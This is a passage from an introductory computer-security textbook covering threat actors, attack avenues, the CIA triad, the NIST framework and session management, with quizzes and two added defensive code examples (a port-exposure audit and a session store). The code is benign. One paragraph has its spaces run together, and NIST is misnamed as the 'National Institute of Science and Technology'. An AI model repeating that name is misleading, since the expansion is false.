Generally, attacks by an individual or even a small group of attackers fall into the unstructured threat category. Attacks at this level generally are conducted over short periods of time (lasting at most a few months), do not involve a large number of individuals, have little financial backing, and are accomplished by insiders or outsiders who do not seek collusion with insiders. Intruders, or those who are attempting to conduct an intrusion, definitely come in many different varieties and have varying degrees of sophistication (see Figure 1.1). At the low end technically are what are generally referred to as script kiddies, individuals who do not have the technical expertise to develop scripts or discover new vulnerabilities in software but who have just enough understanding of computer systems to be able to download and run scripts that others have developed. These individuals generally are not interested in attacking specific targets, but instead simply want to find any organization that may not have patched a newly discovered vulnerability for which the script kiddie has located an exploit script. It is hard to estimate how many of the individuals performing activities such as probing networks or scanning individual systems are part of this group, but it is undoubtedly the fastest growing group, and the vast majority of the "unfriendly" activity occurring on the Internet is probably carried out by these individuals.

Figure 1.1 Distribution of attacker skill levels

At the next level are those people who are capable of writing scripts to exploit known vulnerabilities. These individuals are much more technically competent than script kiddies and account for an estimated 8 to 12 percent of malicious Internet activity. At the top end of this spectrum are those highly technical individuals, often referred to as elite hackers, who not only have the ability to write scripts that exploit vulnerabilities but also are capable of discovering new vulnerabilities. This group is the smallest of the lot, however, and is responsible for, at most, only 1 to 2 percent of intrusive activity.
Insiders

It is generally acknowledged by security professionals that insiders are more dangerous in many respects than outside intruders. The reason for this is simple: insiders have the access and knowledge necessary to cause immediate damage to an organization. Most security is designed to protect against outside intruders and thus lies at the boundary between the organization and the rest of the world. Insiders may actually already have all the access they need to perpetrate criminal activity such as fraud. In addition to unprecedented access, insiders also frequently have knowledge of the security systems in place and are better able to avoid detection. Attacks by insiders are often the result of employees who have become disgruntled with their organization and are looking for ways to disrupt operations. It is also possible that an "attack" by an insider may be an accident and not intended as an attack at all. An example of this might be an employee who deletes a critical file without understanding its critical nature.
Tech Tip

The Inside Threat One of the hardest threats that security professionals will have to address is that of the insider. Since employees already have access to the organization and its assets, additional mechanisms need to be in place to detect attacks by insiders and to lessen the ability of these attacks to succeed.
Employees are not the only insiders that organizations need to be concerned about. Often, numerous other individuals have physical access to company facilities. Custodial crews frequently have unescorted access throughout the facility, often when nobody else is around. Other individuals, such as contractors or partners, may have not only physical access to the organization's facilities but also access to computer systems and networks. A contractor involved in U.S. intelligence computing, Edward Snowden, was charged with espionage in 2013 after he released a wide range of data illustrating the technical capabilities of U.S. intelligence surveillance systems. He is the ultimate insider, with his name becoming synonymous with the insider threat issue.
Criminal Organizations

As businesses became increasingly reliant upon computer systems and networks, and as the amount of financial transactions conducted via the Internet increased, it was inevitable that criminal organizations would eventually turn to the electronic world as a new target to exploit. Criminal activity on the Internet at its most basic is no different from criminal activity in the physical world. Fraud, extortion, theft, embezzlement, and forgery all take place in the electronic environment. One difference between criminal groups and the "average" hacker is the level of organization that criminal elements employ in their attack. Criminal groups typically have more money to spend on accomplishing the criminal activity and are willing to spend extra time accomplishing the task provided the level of reward at the conclusion is great enough. With the tremendous amount of money that is exchanged via the Internet on a daily basis, the level of reward for a successful attack is high enough to interest criminal elements. Attacks by criminal organizations usually fall into the structured threat category, which is characterized by a greater amount of planning, a longer period of time to conduct the activity, more financial backing to accomplish it, and possibly corruption of, or collusion with, insiders.
Nation-States, Terrorists, and Information Warfare

As nations have increasingly become dependent on computer systems and networks, the possibility that these essential elements of society might be targeted by organizations or nations determined to adversely affect another nation has become a reality. Many nations today have developed to some extent the capability to conduct information warfare. There are several definitions for information warfare, but a simple one is that it is warfare conducted against the information and information processing equipment used by an adversary. In practice, this is a much more complicated subject, because information not only may be the target of an adversary, but also may be used as a weapon. Whatever definition you use, information warfare falls into the highly structured threat category. This type of threat is characterized by a much longer period of preparation (years is not uncommon), tremendous financial backing, and a large and organized group of attackers. The threat may include attempts not only to subvert insiders but also to plant individuals inside of a potential target in advance of a planned attack.
Tech Tip

Information Warfare Once only the concern of governments and the military, information warfare today can involve many other individuals. With the potential to attack the various civilian-controlled critical infrastructures, security professionals in nongovernmental sectors today must also be concerned about defending their systems against attack by agents of foreign governments.
An interesting aspect of information warfare is the list of possible targets available. We have grown accustomed to the idea that, during war, military forces will target opposing military forces but will generally attempt to destroy as little civilian infrastructure as possible. In information warfare, military forces are certainly still a key target, but much has been written about other targets, such as the various infrastructures that a nation relies on for its daily existence. Water, electricity, oil and gas refineries and distribution, banking and finance, telecommunications: all fall into the category of critical infrastructures for a nation. Critical infrastructures are those whose loss would have severe repercussions on the nation. With countries relying so heavily on these infrastructures, it is inevitable that they will be viewed as valid targets during conflict. Given how dependent these infrastructures are on computer systems and networks, it is also inevitable that these same computer systems and networks will be targeted for a cyber attack in an information war.

As demonstrated by the Stuxnet attacks and the cyber attacks in Estonia, the risk of nation-state attacks is real. There have been numerous accusations of intellectual property theft being sponsored by, and in some cases even performed by, nation-state actors. In a world where information dominates government, business, and economies, the collection of information is the key to success, and with large rewards, the list of characters willing to spend significant resources is long.
Security Trends

The biggest change affecting computer security that has occurred over the last 30 years has been the transformation of the computing environment from large mainframes to a highly interconnected network of smaller systems. This interconnection of systems is the Internet, and it now touches virtually all systems. What this has meant for security is a switch from a closed operating environment in which everything was fairly contained to one in which access to a computer can occur from almost anywhere on the planet. This has, for obvious reasons, greatly complicated the job of the security professional.

The type of individual who attacks a computer system or network has also evolved over the last 30 years. As illustrated by the sample of attacks listed previously, the attackers have become more focused on gain over notoriety. Today computer attacks are used to steal and commit fraud and other crimes in the pursuit of monetary enrichment. Computer crimes are big business today, not just because it is hard to catch the perpetrators, but also because the number of targets is large and the rewards greater than robbing local stores.

Over the past several years a wide range of computer industry firms have begun issuing annual security reports. Among these firms is Verizon, which has issued its annual Data Breach Investigations Report (DBIR) since 2008 and is lauded because of its breadth and depth. The 2015 DBIR was based on over 2,100 data breaches and 79,790 security incidents in 61 countries. Perhaps the most valuable aspect of the DBIR is its identification of common details that result in a data breach. The Verizon DBIRs are available at www.verizonenterprise.com/DBIR/

In the early days of computers, security was considered to be a binary condition in which your system was either secure or not secure. Security efforts were made to achieve a state of security, meaning that the system was secure. Today, the focus has changed. In light of the revelation that a pure state of security is not achievable in the binary sense, the focus has shifted to one of risk management. Today, the question is how much risk your system is exposed to, and from what sources.
Targets and Attacks

There are two general reasons a particular computer system is attacked: either it is specifically targeted by the attacker, or it is an opportunistic target.

Specific Target In this case, the attacker has chosen the target not because of the hardware or software the organization is running but for another reason, perhaps a political reason. An example of this type of attack would be an individual in one country attacking a government system in another. Alternatively, the attacker may be targeting the organization as part of a hacktivist attack. For example, an attacker may deface the web site of a company that sells fur coats because the attacker feels that using animals in this way is unethical. Perpetrating some sort of electronic fraud is another reason a specific system might be targeted. Whatever the reason, an attack of this nature is decided upon before the attacker knows what hardware and software the organization has.

The motive behind most computer attacks falls into one of two categories:
1. To deprive someone of the use of their system.
2. To use someone else's system to enrich oneself.
In some cases, the use of a denial-of-service attack (item 1) precedes the actual heist (item 2).

Opportunistic Target The second type of attack, an attack against a target of opportunity, is conducted against a site that has software that is vulnerable to a specific exploit. The attackers, in this case, are not targeting the organization; instead, they have learned of a vulnerability and are simply looking for an organization with this vulnerability that they can exploit. This is not to say that an attacker might not be targeting a given sector and looking for a target of opportunity in that sector, however. For example, an attacker may desire to obtain credit card or other personal information and may search for any exploitable company with credit card information in order to carry out the attack. Targeted attacks are more difficult and take more time than attacks on a target of opportunity. The latter simply relies on the fact that with any piece of widely distributed software, there will almost always be somebody who has not patched the system (or has not patched it properly) as they should have.
Minimizing Possible Avenues of Attack

Understanding the steps an attacker will take enables you to limit the exposure of your system and minimize those avenues an attacker might possibly exploit. There are multiple elements to a solid computer defense, but two of the key elements involve limiting an attacker's avenues of attack.

The first step an administrator can take to reduce possible attacks is to ensure that all patches for the operating system and applications are installed. Many security problems that we read about, such as viruses and worms, exploit known vulnerabilities for which patches exist. The reason such malware caused so much damage in the past was that administrators did not take the appropriate actions to protect their systems.

The second step an administrator can take is system hardening, which involves limiting the services that are running on the system. Only using those services that are absolutely needed does two things: it limits the possible avenues of attack (those services with vulnerabilities that can be exploited), and it reduces the number of services the administrator has to worry about patching in the first place. This is one of the important first steps any administrator should take to secure a computer system. System hardening is covered in detail in Chapter 14.

While there are no iron-clad defenses against attack, or guarantees that an attack won't be successful, you can take steps to reduce the risk of loss. This is the basis for the change in strategy from a defense-based one to one based on risk management. Risk management is covered in detail in Chapter 20.
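The hardening step above (run only the services you need) is easiest to enforce when you can measure it. The following is an added example, not from the textbook: a POSIX shell function that reads the listening-socket listing produced by the Linux `ss -lntpH` command, ignores sockets bound only to loopback (not reachable from the network), and reports every network-facing TCP port that is not on an explicit allowlist, together with the process name bound to it. The allowlist, the host's role, and the sample `ss` output are all constructed for the illustration; on a real host you would pipe `ss -lntpH` into `audit_listeners` instead of the sample and then disable or firewall whatever it reports.

```shell
#!/bin/sh
# Added example (not the textbook's code): attack-surface audit of listening TCP services.
# Assumes the column layout of Linux `ss -lntpH`:
#   State Recv-Q Send-Q Local-Address:Port Peer-Address:Port Process

# Constructed allowlist for a hypothetical web server that should expose only SSH and HTTPS.
ALLOWED_PORTS="22 443"

# Constructed sample of `ss -lntpH` output for that server.
SAMPLE_SS_OUTPUT='LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=812,fd=3))
LISTEN 0 511 0.0.0.0:443 0.0.0.0:* users:(("nginx",pid=1021,fd=6))
LISTEN 0 128 0.0.0.0:111 0.0.0.0:* users:(("rpcbind",pid=540,fd=4))
LISTEN 0 50 127.0.0.1:3306 127.0.0.1:* users:(("mysqld",pid=990,fd=20))
LISTEN 0 128 0.0.0.0:23 0.0.0.0:* users:(("inetd",pid=600,fd=5))'

# audit_listeners "PORT PORT ..." < ss_output
# Prints "port process" for each LISTEN socket bound to a non-loopback address
# whose port is not in the space-separated allowlist. Loopback-only sockets are
# skipped because they are not part of the network-facing attack surface.
audit_listeners() {
    allowed="$1"
    awk -v allowed="$allowed" '
    BEGIN { n = split(allowed, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
    $1 == "LISTEN" {
        addr = $4
        port = addr; sub(/.*:/, "", port)          # text after the last colon
        host = addr; sub(/:[^:]*$/, "", host)      # text before the last colon
        if (host ~ /^(127\.|\[::1\]|::1)/) next    # loopback only: not network-facing
        proc = "?"
        # Process name is the first quoted string inside users:(("name",pid=...))
        if (match($0, /\("[^"]+"/)) proc = substr($0, RSTART + 2, RLENGTH - 3)
        if (!(port in ok)) print port, proc
    }'
}

# Convenience wrapper that runs the audit over the constructed sample.
unexpected_listeners() {
    printf '%s\n' "$SAMPLE_SS_OUTPUT" | audit_listeners "$ALLOWED_PORTS"
}

# Stand-alone usage: on a real host replace the sample with `ss -lntpH | audit_listeners "$ALLOWED_PORTS"`.
unexpected_listeners
```

Against the constructed sample the audit flags rpcbind on port 111 and the inetd-managed telnet listener on port 23; mysqld is not reported because it listens only on 127.0.0.1. Each reported line is a service that is either unneeded (stop and disable it) or needed but unexpected (add it to the allowlist and to the patch inventory), which is exactly the two-sided benefit of hardening described above.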
Approaches to Computer Security

While much of the discussion of computer security focuses on how systems are attacked, it is equally important to consider the structure of defenses. There are three major considerations when securing a system:

Correctness Ensuring that a system is fully up to date, with all patches installed and proper security controls in place; this goes a long way toward minimizing risk. Correctness begins with a secure development lifecycle (covered in Chapter 18), continues through patching and hardening (Chapters 14 and 21), and culminates in operations (Chapters 3, 4, 19, and 20).

Isolation Protecting a system from unauthorized use, by means of access control and physical security. Isolation begins with infrastructure (covered in Chapters 9 and 10), continues with access control (Chapters 8, 11, and 12), and includes the use of cryptography (Chapters 5, 6, and 7).

Obfuscation Making it difficult for an adversary to know when they have succeeded. Whether accomplished by obscurity, randomization, or obfuscation, increasing the workload of an attacker makes it more difficult for them to succeed in their attack. Obfuscation occurs throughout all topics, as it is a built-in element, whether in the form of random numbers in crypto or address space randomization, stack guards, or pointer encryption at the operating system level.

Each of these approaches has its inherent flaws, but taken together, they can provide a strong means of system defense.
Ethics

Any meaningful discussion about operational aspects of information security must include the topic of ethics. Ethics is commonly defined as a set of moral principles that guides an individual's or group's behavior. Because information security efforts frequently involve trusting people to keep secrets that could cause harm to the organization if revealed, trust is a foundational element in the people side of security. And trust is built upon a code of ethics, a norm that allows everyone to understand expectations and responsibilities. There are several different ethical frameworks that can be applied to making a decision, and these are covered in detail in Chapter 25.

Ethics is a difficult topic; separating right from wrong is easy in many cases, but in other cases it is more difficult. For example, writing a virus that damages a system is clearly bad behavior, but is writing a worm that goes out and patches systems, without the users' permission, right or wrong? Do the ends justify the means? Such questions are the basis of the ethical discussions that define the challenges faced by security personnel on a regular basis.
Additional References
1. http://en.wikipedia.org/wiki/Timeline_of_computer_security_hacker_history
2. http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/
3. www.verizonenterprise.com/DBIR/
Chapter 1 Review

Chapter Summary After reading this chapter and completing the quizzes, you should understand the following regarding security threats and trends.

Define computer security
Computer security is defined by operating in a manner where the system does what it is supposed to do and only what it is supposed to do.
Information security is defined by the information being protected from unauthorized access or alteration and yet is available to authorized individuals when required.

Discuss common threats and recent computer crimes that have been committed
There are a number of different threats to security, including viruses and worms, intruders, insiders, criminal organizations, terrorists, and information warfare conducted by foreign countries.
There are two general reasons a particular computer system is attacked: it is specifically targeted by the attacker, or it is a target of opportunity.
Targeted attacks are more difficult and take more time than attacks on a target of opportunity.
The different types of electronic crime fall into two main categories: crimes in which the computer was the target of the attack, and incidents in which the computer was a means of perpetrating a criminal act.
One significant trend observed over the last several years has been the increase in the number of computer attacks and their effectiveness.

List and discuss recent trends in computer security
There are many different ways to attack computers and networks to take advantage of what has made shopping, banking, investment, and leisure pursuits a simple matter of "dragging and clicking" for many people.
The biggest change that has occurred in security over the last 30 years has been the transformation of the computing environment from large mainframes to a highly interconnected network of much smaller systems.

Describe common avenues of attacks
An attacker can use a common technique against a wide range of targets in an opportunistic attack, only succeeding where the attack is viable.
An attacker can employ a variety of techniques against a specific target when it is desired to obtain access to a specific system.

Describe approaches to computer security
There are three main approaches an enterprise can employ, one based on correctness, one involving isolation, and one involving obfuscation.
The ideal method is to employ all three together.

Discuss the relevant ethical issues associated with computer security
Ethics is commonly defined as a set of moral principles that guides an individual's or group's behaviors.
Because information security efforts frequently involve trusting people to keep secrets that could cause harm to the organization if revealed, trust is a foundational element in the people side of security.
Key Terms computer security, critical infrastructure, elite hacker, hacker, hacking, hacktivist, highly structured threat, information warfare, script kiddie, structured threat, unstructured threat
Key Terms Quiz Use terms from the Key Terms list to complete the sentences that follow. Don't use the same term more than once. Not all terms will be used.
1. A(n) _______________ is characterized by a greater amount of planning, a longer period of time to conduct the activity, more financial backing to accomplish it, and the possible corruption of, or collusion with, insiders.
2. A hacker whose activities are motivated by a personal cause or position is known as a(n) _______________.
3. A(n) _______________ is one whose loss would have a severe detrimental impact on the nation.
4. _______________ is conducted against the information and information processing equipment used by an adversary.
5. Actors who deliberately access computer systems and networks without authorization are called _______________.
6. A(n) _______________ generally is short-term in nature, does not involve a large group of individuals, does not have large financial backing, and does not include collusion with insiders.
7. A(n) _______________ is a highly technically competent individual who conducts intrusive activity on the Internet and is capable of not only exploiting known vulnerabilities but also finding new vulnerabilities.
8. The act of deliberately accessing computer systems and networks without authorization is generally referred to as _______________.
9. A(n) _______________ is an individual who does not have the technical expertise to develop scripts or discover new vulnerabilities in software but who has just enough understanding of computer systems to be able to download and run scripts that others have developed.
10. A(n) _______________ is characterized by a much longer period of preparation (years is not uncommon), tremendous financial backing, and a large and organized group of attackers.
Multiple-Choice Quiz
1. Which threats are characterized by possibly long periods of preparation (years is not uncommon), tremendous financial backing, a large and organized group of attackers, and attempts to subvert insiders or to plant individuals inside a potential target in advance of a planned attack?
A. Unstructured threats
B. Structured threats
C. Highly structured threats
D. Nation-state information warfare threats
2. In which of the following is an attacker looking for any organization vulnerable to a specific exploit rather than attempting to gain access to a specific organization?
A. Target of opportunity attack
B. Targeted attack
C. Vulnerability scan attack
D. Information warfare attack
3. The rise of which of the following has greatly increased the number of individuals who probe organizations looking for vulnerabilities to exploit?
A. Virus writers
B. Script kiddies
C. Hackers
D. Elite hackers
4. For what reason(s) do some security professionals consider insiders more dangerous than outside intruders?
A. Employees (insiders) are easily corrupted by criminal and other organizations.
B. Insiders have the access and knowledge necessary to cause immediate damage to the organization.
C. Insiders have knowledge of the security systems in place and are better able to avoid detection.
D. Both B and C
5. The act of deliberately accessing computer systems and networks without authorization is generally known as:
A. Computer intrusion
B. Hacking
C. Cracking
D. Probing
6. What is the most common problem/threat an organization faces?
A. Viruses/worms
B. Script kiddies
C. Hackers
D. Hacktivists
7. Warfare conducted against the information and information processing equipment used by an adversary is known as:
A. Hacking
B. Cyberterrorism
C. Information warfare
D. Network warfare
8. An attacker who feels that using animals to make fur coats is unethical and thus defaces the web site of a company that sells fur coats is an example of:
A. Information warfare
B. Hacktivism
C. Cybercrusading
D. Elite hacking
9. Criminal organizations would normally be classified as what type of threat?
A. Unstructured
B. Unstructured but hostile
C. Structured
D. Highly structured
10. Which of the following individuals have the ability to not only write scripts that exploit vulnerabilities but also discover new vulnerabilities?
A. Elite hackers
B. Script kiddies
C. Hacktivists
D. Insiders
Essay Quiz
1. Reread the various examples of computer crimes at the beginning of this chapter. Categorize each as either a crime where the computer was the target of the criminal activity or a crime in which the computer was a tool in accomplishing the criminal activity.
2. A friend of yours has just been hired by an organization as its computer security officer. Your friend is a bit nervous about this new job and has come to you, knowing that you are taking a computer security class, to ask your advice on measures that can be taken that might help prevent an intrusion. What three things can you suggest that are simple but can tremendously help limit the possibility of an attack?
3. Discuss the major difference between a target of opportunity attack and a targeted attack. Which do you believe is the more common one?

Lab Project
Lab Project 1.1 A number of different examples of computer crimes were discussed in this chapter. Similar activities seem to happen daily. Do a search on the Internet to see what other examples you can find. Try to obtain the most recent examples possible.
Chapter 2 General Security Concepts

"A people that values its privileges above its principles soon loses both."
—DWIGHT D. EISENHOWER

In this chapter, you will learn how to
Define basic terms associated with computer and information security
Identify the basic approaches to computer and information security
Identify the basic principles of computer and information security
Distinguish among various methods to implement access controls
Describe methods used to verify the identity and authenticity of an individual
Recognize some of the basic models used to implement security in operating systems

In Chapter 1, you learned about some of the various threats that we, as security professionals, face on a daily basis. In this chapter, you start exploring the field of computer security. Computer security has a series of fundamental concepts that support the discipline. In this chapter we will begin with an examination of security models and concepts and proceed to see how they are operationally employed.
Basic Security Terminology

The term hacking has been used frequently in the media. A hacker was once considered an individual who understood the technical aspects of computer operating systems and networks. Hackers were individuals you turned to when you had a problem and needed extreme technical expertise. Today, primarily as a result of the media, the term is used more often to refer to individuals who attempt to gain unauthorized access to computer systems or networks. While some would prefer to use the terms cracker and cracking when referring to this nefarious type of activity, the terminology generally accepted by the public is that of hacker and hacking. A related term that may sometimes be seen is phreaking, which refers to the "hacking" of the systems and computers used by a telephone company to operate its telephone network.

The field of computer security constantly evolves, introducing new terms frequently, which are often coined by the media. Make sure to learn the meaning of terms such as hacking, phreaking, vishing, phishing, pharming, and spear phishing. Some of these have been around for many years, such as hacking, whereas others have appeared only in the last few years, such as spear phishing.
Security Basics

Computer security itself is a term that has many meanings and related terms. Computer security entails the methods used to ensure that a system is secure. Subjects such as authentication and access controls must be addressed in broad terms of computer security. Seldom in today's world are computers not connected to other computers in networks. This then introduces the term network security to refer to the protection of the multiple computers and other devices that are connected together. Related to these two terms are two others: information security and information assurance, which place the focus of the security process not on the hardware and software being used but on the data that is processed by them. Assurance also introduces another concept, that of the availability of the systems and information when we want them. The common press and many professionals have settled on cybersecurity as the term to describe the field. Still another term that may be heard in the security world is COMSEC, which stands for communications security and deals with the security of telecommunication systems.

Cybersecurity has become regular headline news these days, with reports of break-ins, data breaches, fraud, and a host of other calamities. The general public has become increasingly aware of its dependence on computers and networks and consequently has also become interested in the security of these same computers and networks. As a result of this increased attention by the public, several new terms have become commonplace in conversations and print. Terms such as hacking, virus, TCP/IP, encryption, and firewalls are now frequently encountered in mainstream news media and have found their way into casual conversations. What was once the purview of scientists and engineers is now part of our everyday life.

With our increased daily dependence on computers and networks to conduct everything from making purchases at our local grocery store, banking, trading stocks, and receiving medical treatment to driving our children to school, ensuring that computers and networks are secure has become of paramount importance. Computers and the information they manipulate have become a part of virtually every aspect of our lives.
The“CIA”ofSecurityAlmostfromitsinception,thegoalofcomputersecurityhasbeenthreefold:confidentiality,integrity,andavailability—the“CIA”ofsecurity.Thepurposeofconfidentialityistoensurethatonlythoseindividualswhohavetheauthoritytoviewapieceofinformationmaydoso.Nounauthorizedindividualshouldeverbeabletoviewdatatheyarenotentitledtoaccess.Integrityisarelatedconceptbutdealswiththegenerationandmodificationofdata.Onlyauthorizedindividualsshouldeverbeabletocreateorchange(ordelete)information.Thegoalofavailabilityistoensurethatthedata,orthesystemitself,isavailableforusewhentheauthorizeduserwantsit.
Tech Tip
CIA of Security
While there is no universal agreement on authentication, auditability, and nonrepudiation as additions to the original CIA of security, there is little debate over whether confidentiality, integrity, and availability are basic security principles. Understand these principles, because one or more of them are the reason most security hardware, software, policies, and procedures exist.
As a result of the increased use of networks for commerce, two additional security goals have been added to the original three in the CIA of security. Authentication attempts to ensure that an individual is who they claim to be. The need for this in an online transaction is obvious. Related to this is nonrepudiation, which deals with the ability to verify that a message has been sent and received and that the sender can be identified and verified. The requirement for this capability in online transactions should also be readily apparent. Recent emphasis on systems assurance has raised the potential inclusion of the term auditability, which refers to whether a control can be verified to be functioning properly. In security, it is imperative that we can track actions to ensure what has or has not been done.
The Operational Model of Computer Security
For many years, the focus of security was on prevention. If we could prevent everyone who did not have authorization from gaining access to our computer systems and networks, then we assumed that we had achieved security. Protection was thus equated with prevention. While the basic premise of this is true, it fails to acknowledge the realities of the networked environment our systems are part of. No matter how well we seem to do in prevention technology, somebody always seems to find a way around our safeguards. When this happens, our system is left unprotected. Thus, we need multiple prevention techniques and also technology to alert us when prevention has failed and to provide ways to address the problem. This results in a modification to our original security equation with the addition of two new elements—detection and response. Our security equation thus becomes:
Protection = Prevention + (Detection + Response)
This is known as the operational model of computer security. Every security technique and technology falls into at least one of the three elements of the equation. Examples of the types of technology and techniques that represent each are depicted in Figure 2.1.
• Figure 2.1 Sample technologies in the operational model of computer security
Cybersecurity Framework Model
In 2013, President Obama signed an executive order directing the U.S. National Institute of Science and Technology (NIST) to work with industry and develop a cybersecurity framework. This was in response to several significant cybersecurity events where the victim companies appeared to be unprepared. The resulting framework, titled Framework for Improving Critical Infrastructure Cybersecurity, was created as a voluntary system, based on existing standards, guidelines, and practices, to facilitate adoption and acceptance across a wide array of industries.
Tech Tip
Cybersecurity Framework
The NIST Cybersecurity Framework is a risk-based approach to implementation of cybersecurity activities in an enterprise. The framework provides a common taxonomy of standards, guidelines, and practices that can be employed to strengthen cybersecurity efforts. The framework can be obtained from NIST:
www.nist.gov/cyberframework/upload/cybersecurity-framework-021214-final.pdf
The Cybersecurity Framework provides a common taxonomy and mechanism to assist in aligning management practices with existing standards, guidelines, and practices. Its purpose is to complement and enhance risk management efforts through
1. Determining their current cybersecurity posture
2. Documenting their desired target state with respect to cybersecurity
3. Determining and prioritizing improvement and corrective actions
4. Measuring and monitoring progress toward goals
5. Creating a communication mechanism for coordination among stakeholders
The framework is composed of five core functions, as illustrated in Figure 2.2. Two of these core functions, Identify and Protect, describe actions taken before an incident. Detect is the core function associated with intrusion detection or the beginning of an incident response. The last two, Respond and Recover, detail actions that take place during the post-incident response. Examples of the items under each function are illustrated in the figure. In addition to the five functions, the framework has levels of implementation referred to as tiers. These tiers represent the organization's ability from Partial (Tier 1) to Adaptive (Tier 4).
• Figure 2.2 Cybersecurity Framework core functions
Security Tenets
In addition to the CIA elements, there are additional tenets that form a basis for system security. The three operational tenets found in secure deployments are session management, exception management, and configuration management.
Session Management
Session management is the set of activities employed to establish a communication channel between two parties, identifying each in a manner that allows future activity without renewed authentication. Session management allows an application to authenticate once and have subsequent activities ascribed to the authenticated user. Sessions are frequently used in web applications to preserve state and user information between normally stateless clicks. Sessions are typically identified by an ID that is known to both sides of the conversation. This ID can be used as a token for future identification. If confidentiality is required, then the channel should be secured by an appropriate level of cryptographic protection.
Tech Tip
Session Management Cheat Sheet
Session management is a common task for web applications, and the Open Web Application Security Project (OWASP) has a cheat sheet to assist in the correct implementation of session management. See https://www.owasp.org/index.php/Session_Management_Cheat_Sheet.
Session management includes all the activities necessary to manage the session, from establishment, during use, and at completion of the conversation. Because the session represents the continuity of a security condition established during authentication, the level of protection that should be afforded to the session ID should be commensurate with the level of security initially established.
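The following Python program is an added example, not code from the textbook, that puts the session-management points above into a small server-side session store: the session ID is an unguessable token bound to the authenticated user, it is checked and refreshed on every request, it expires on inactivity and after an absolute lifetime, it can be re-issued after authentication, and logout destroys it on the server. The timeout values and the injectable clock are assumptions made for this illustration.

```python
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, Optional

# Timeouts are assumptions for this example, not values from the text.
IDLE_TIMEOUT = 15 * 60       # seconds without activity before the session is dropped
ABSOLUTE_TIMEOUT = 8 * 3600  # hard cap on a session's life, even if it stays active


@dataclass
class Session:
    user: str          # the identity established at authentication time
    created: float     # when the session was issued
    last_seen: float   # last request that presented this ID


class SessionStore:
    """Server-side session table keyed by an unguessable session ID."""

    def __init__(self, clock: Callable[[], float] = time.time):
        self._clock = clock            # injectable so expiry can be tested
        self._sessions: Dict[str, Session] = {}

    def create(self, user: str) -> str:
        # 32 random bytes from the OS CSPRNG: the ID is the bearer token for the
        # whole session, so it must be unpredictable, never sequential or derived
        # from the user name.
        sid = secrets.token_urlsafe(32)
        now = self._clock()
        self._sessions[sid] = Session(user, now, now)
        return sid

    def lookup(self, sid: str) -> Optional[str]:
        """Return the user bound to sid, or None if unknown or expired."""
        session = self._sessions.get(sid)
        if session is None:
            return None
        now = self._clock()
        if (now - session.last_seen > IDLE_TIMEOUT
                or now - session.created > ABSOLUTE_TIMEOUT):
            self.destroy(sid)          # expired sessions are removed, not just refused
            return None
        session.last_seen = now
        return session.user

    def rotate(self, sid: str) -> Optional[str]:
        """Re-issue the session under a fresh ID. Do this when the security
        condition changes (after login, after a privilege change) so that an
        ID seen before that point no longer identifies the session."""
        session = self._sessions.pop(sid, None)
        if session is None:
            return None
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = session
        return new_sid

    def destroy(self, sid: str) -> None:
        """Logout: forget the ID on the server side, not only in the browser."""
        self._sessions.pop(sid, None)


if __name__ == "__main__":
    store = SessionStore()
    sid = store.create("alice")           # constructed user name
    print("logged in as", store.lookup(sid))
    store.destroy(sid)
    print("after logout:", store.lookup(sid))
```

Because the channel carries only the ID after authentication, the level of protection given to the ID (unpredictability, expiry, transport over an encrypted channel, server-side invalidation) is what determines how much the session can be trusted later.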
Exception Management
Exceptions are the invocation of conditions that fall outside the normal sequence of operation. Whether by error or malicious action, exceptions are changes to normal processing and need to be managed. The special processing required by conditions that fall outside normal parameters can result in errors either locally or in follow-on processes in a system. The handling of exceptions, referred to as exception handling, is an important consideration during software development. Exception management is more than just exception handling in software development. When the operation of a system encounters an exception, whether it is invoked by a person, process, technology, or combination, the system must effectively handle the condition. This can mean many different things, sometimes even operating outside normal policy limits. Exception management can also be nontechnical in nature: systems or environments that cannot follow organizational security policy, for example, must be documented, exceptions must be approved, and mitigations must be put in place to lower the risk associated with exceptions to policy. The bottom line is simple: either the system must handle the condition and recover, or it must fail and be recovered by separate action. Designing in exception handling makes a system more resilient, because exceptions will happen, and how they are handled is the only unknown outcome.
Configuration Management
Configuration management is key to the proper operation of IT systems. IT systems are first and foremost systems, groups of elements that work together to achieve a desired resultant process. The proper configuration and provisioning of all of the components in a system is essential to the proper operation of the system. The design and operation of the elements to ensure the proper functional environment of a system is referred to as configuration management. Configuration management is a key operation principle and is thoroughly covered in Chapter 21.
Security Approaches
There are multiple approaches an organization can take to address the protection of its networks: ignore security issues, provide host security, provide network-level security, or provide a combination of the latter two. The middle two, host security and network-level security, have prevention as well as detection and response components. Rather than view these two approaches as independent solutions, a mature organization uses both in a complementary fashion.
If an organization decides to ignore security, it has chosen to utilize the minimal amount of security that is provided with its workstations, servers, and devices. No additional security measures will be implemented. Each "out of the box" system has certain security settings that can be configured, and they should be. To actually protect an entire network, however, requires work in addition to the few protection mechanisms that come with systems by default.
Tech Tip
Got Network?
A classic black T-shirt in the security industry says "got root?" It's a takeoff on the successful ad campaign "got milk?" and indicates the power of root privilege. Similar to "got root?" is "got network?", for if you truly "own" the network, then you have significant control over what passes across it, which can result in information disclosure. To ensure a secure posture, both network and host access levels must be controlled.
Host Security
Host security takes a granular view of security by focusing on protecting each computer and device individually instead of addressing protection of the network as a whole. When host security is used, each computer is relied upon to protect itself. If an organization decides to implement only host security and does not include network security, there is a high probability of introducing or overlooking vulnerabilities. Most environments are filled with different operating systems (Windows, UNIX, Linux, OS X), different versions of those operating systems, and different types of installed applications. Each operating system has security configurations that differ from those of other systems, and different versions of the same operating system may in fact have configuration variations between them.
Host security is important and should always be addressed. Security, however, should not stop there, as host security is a complementary process to be combined with network security. If individual host computers have vulnerabilities embodied within them, then network security can provide another layer of protection that will, hopefully, stop any intruders who have gotten that far into the environment.
A long-standing discussion has centered on whether host- or network-based security is more important. Most security experts now generally agree that a combination of both is needed to adequately address the wide range of possible security threats. Certain attacks are more easily spotted and some attacks are more easily prevented using tools designed for one or the other of these approaches.
Network Security
In some smaller environments, host security by itself may be an option, but as systems become connected into networks, security should include the actual network itself. In network security, an emphasis is placed on controlling access to internal computers from external entities. This control can be through devices such as routers, firewalls, authentication hardware and software, encryption, and intrusion detection systems (IDSs).
